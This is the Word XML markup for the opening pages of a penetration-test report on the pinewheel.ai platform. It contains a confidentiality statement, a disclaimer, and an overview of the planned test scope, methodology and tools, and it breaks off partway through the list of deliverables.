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2E03A" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc321147149"/>
      <w:bookmarkStart w:id="1" w:name="_Toc318188227"/>
      <w:bookmarkStart w:id="2" w:name="_Toc318188327"/>
      <w:bookmarkStart w:id="3" w:name="_Toc318189312"/>
      <w:bookmarkStart w:id="4" w:name="_Toc321147011"/>
    </w:p>
    <w:p w14:paraId="67D02D21" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607970BF" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D1BEE95" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="588A3834" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E003403" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B7A8DDF" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288B6FB3" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EAD3172" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C19B303" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA4DA07" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65C6EA05" w14:textId="40F546AB" w:rsidR="00C6554A" w:rsidRPr="008B5277" w:rsidRDefault="00AA5673" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Photo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="622E3BD7" wp14:editId="33FD17BB">
            <wp:extent cx="1625970" cy="1625970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="138348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89543" name="Picture 1383489543"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1625970" cy="1625970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkEnd w:id="1"/>
    <w:bookmarkEnd w:id="2"/>
    <w:bookmarkEnd w:id="3"/>
    <w:bookmarkEnd w:id="4"/>
    <w:p w14:paraId="1B0CB429" w14:textId="30D70908" w:rsidR="00C6554A" w:rsidRDefault="00AA5673" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Security Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5168436A" w14:textId="4459E5CE" w:rsidR="00C6554A" w:rsidRPr="00D5413C" w:rsidRDefault="00AA5673" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>pinewheel.ai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EF0E07" w14:textId="15E8409C" w:rsidR="00C6554A" w:rsidRDefault="00AA5673" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="ContactInfo"/>
      </w:pPr>
      <w:r>
        <w:t>Mahadir Bin Muhammed</w:t>
      </w:r>
      <w:r w:rsidR="00C6554A">
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r>
        <w:t>28/02/2025</w:t>
      </w:r>
      <w:r w:rsidR="00C6554A">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF2F77B" w14:textId="4C81C909" w:rsidR="001B2755" w:rsidRDefault="001B2755" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="001B2755">
        <w:lastRenderedPageBreak/>
        <w:t>Confidentiality Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448501DC" w14:textId="77777777" w:rsidR="001B2755" w:rsidRPr="001B2755" w:rsidRDefault="001B2755" w:rsidP="001B2755">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">This document contains </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>sensitive security information</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is intended </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>solely for authorized individuals</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> conducting security assessments within an approved and ethical framework. Any unauthorized access, distribution, or use of this document is strictly prohibited. All findings, methodologies, and recommendations must be handled with the highest level of discretion to prevent misuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA535E1" w14:textId="77777777" w:rsidR="001B2755" w:rsidRDefault="001B2755" w:rsidP="001B2755">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">All parties involved must adhere to </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ethical hacking principles</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, applicable </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>cybersecurity laws</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>organizational security policies</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure compliance and responsible disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3DA81E" w14:textId="77777777" w:rsidR="001B2755" w:rsidRDefault="001B2755" w:rsidP="001B2755">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DA6B377" w14:textId="77777777" w:rsidR="001B2755" w:rsidRDefault="001B2755" w:rsidP="001B2755">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67AC1F91" w14:textId="77777777" w:rsidR="001B2755" w:rsidRPr="001B2755" w:rsidRDefault="001B2755" w:rsidP="001B2755">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52DC5FDD" w14:textId="7271A36C" w:rsidR="001B2755" w:rsidRDefault="001B2755" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="001B2755">
        <w:t>Disclaimer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160689CF" w14:textId="77777777" w:rsidR="001B2755" w:rsidRPr="001B2755" w:rsidRDefault="001B2755" w:rsidP="001B2755">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">This assessment is conducted for </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>educational and security research purposes only</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">. The techniques and tools used in this engagement are intended for </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>legitimate security testing</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and must </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> be used for unauthorized activities. Unauthorized access, exploitation, or data manipulation of any system </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>without explicit permission</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> is illegal and may result in </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>legal consequences</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E17A4E" w14:textId="77777777" w:rsidR="001B2755" w:rsidRPr="001B2755" w:rsidRDefault="001B2755" w:rsidP="001B2755">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">The author(s) and security personnel involved in this assessment </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>assume no liability</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> for any unintended consequences arising from the use or misuse of this information. Organizations and individuals are responsible for ensuring compliance with </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>applicable laws and regulations</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> before executing any security testing procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1DCD57" w14:textId="35A7E98F" w:rsidR="001B2755" w:rsidRPr="001B2755" w:rsidRDefault="001B2755" w:rsidP="001B2755">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">If any vulnerabilities are identified, they should be </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>reported responsibly</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the relevant stakeholders and </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>not disclosed publicly</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2755">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> without prior approval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783DFE81" w14:textId="77777777" w:rsidR="001B2755" w:rsidRDefault="001B2755" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7217677D" w14:textId="77777777" w:rsidR="001B2755" w:rsidRDefault="001B2755" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE3FD48" w14:textId="77777777" w:rsidR="001B2755" w:rsidRDefault="001B2755" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25525E01" w14:textId="77777777" w:rsidR="001B2755" w:rsidRDefault="001B2755" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38586944" w14:textId="77777777" w:rsidR="001B2755" w:rsidRPr="001B2755" w:rsidRDefault="001B2755" w:rsidP="001B2755"/>
    <w:p w14:paraId="33DE07DB" w14:textId="77777777" w:rsidR="001B2755" w:rsidRDefault="001B2755" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F9F830" w14:textId="32CB147F" w:rsidR="00C6554A" w:rsidRDefault="00AA5673" w:rsidP="00C6554A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD2AD9A" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRPr="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00AA5673">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">This security assessment focuses on conducting an in-depth penetration test of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Pinewheel AI platform</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00AA5673">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>https://testing.pinewheel.ai</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">) to identify vulnerabilities and security weaknesses. The assessment involves both </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>authenticated and unauthenticated testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> using a combination of </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>manual techniques and automated tools available in Kali Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665AAD62" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRPr="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00AA5673">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">The primary objective is to </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>identify, exploit, and document</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> potential vulnerabilities such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>SQL Injection (SQLi), Cross-Site Scripting (XSS), Server-Side Request Forgery (SSRF), Server-Side Template Injection (SSTI), Remote Code Execution (RCE), and Prompt Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">. The audit will include </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>enumerating services and endpoints</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, assessing </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>authentication mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>evaluating access control measures</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBA6A88" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRPr="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00AA5673">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>The approach follows a structured methodology:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D95CCC1" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRPr="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00AA5673">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Reconnaissance &amp; Information Gathering</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Identifying exposed services, subdomains, and open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DCF0CA" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRPr="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00AA5673">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Enumeration &amp; Attack Surface Mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Discovering endpoints, authentication mechanisms, and potential misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050E45C9" w14:textId="56F44866" w:rsidR="00AA5673" w:rsidRPr="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00AA5673">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Vulnerability Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Actively probing for security flaws using tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Burp Suite, Nmap, SQLmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F97DFAD" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRPr="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00AA5673">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Exploitation &amp; Post-Exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Validating vulnerabilities and assessing their impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506CB767" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRPr="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00AA5673">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Post-Authentication Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Testing restricted areas after logging in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C4D629" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRPr="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00AA5673">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Reporting &amp; Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Delivering a comprehensive penetration test report detailing </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>findings, proof-of-concepts (PoCs), severity ratings, and remediation recommendations</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B58EABE" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRPr="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00AA5673">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>The final deliverables include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D323AA3" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRPr="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00AA5673">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>detailed pentest report</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> summarizing the identified vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B006138" w14:textId="77777777" w:rsidR="00AA5673" w:rsidRPr="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00AA5673">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
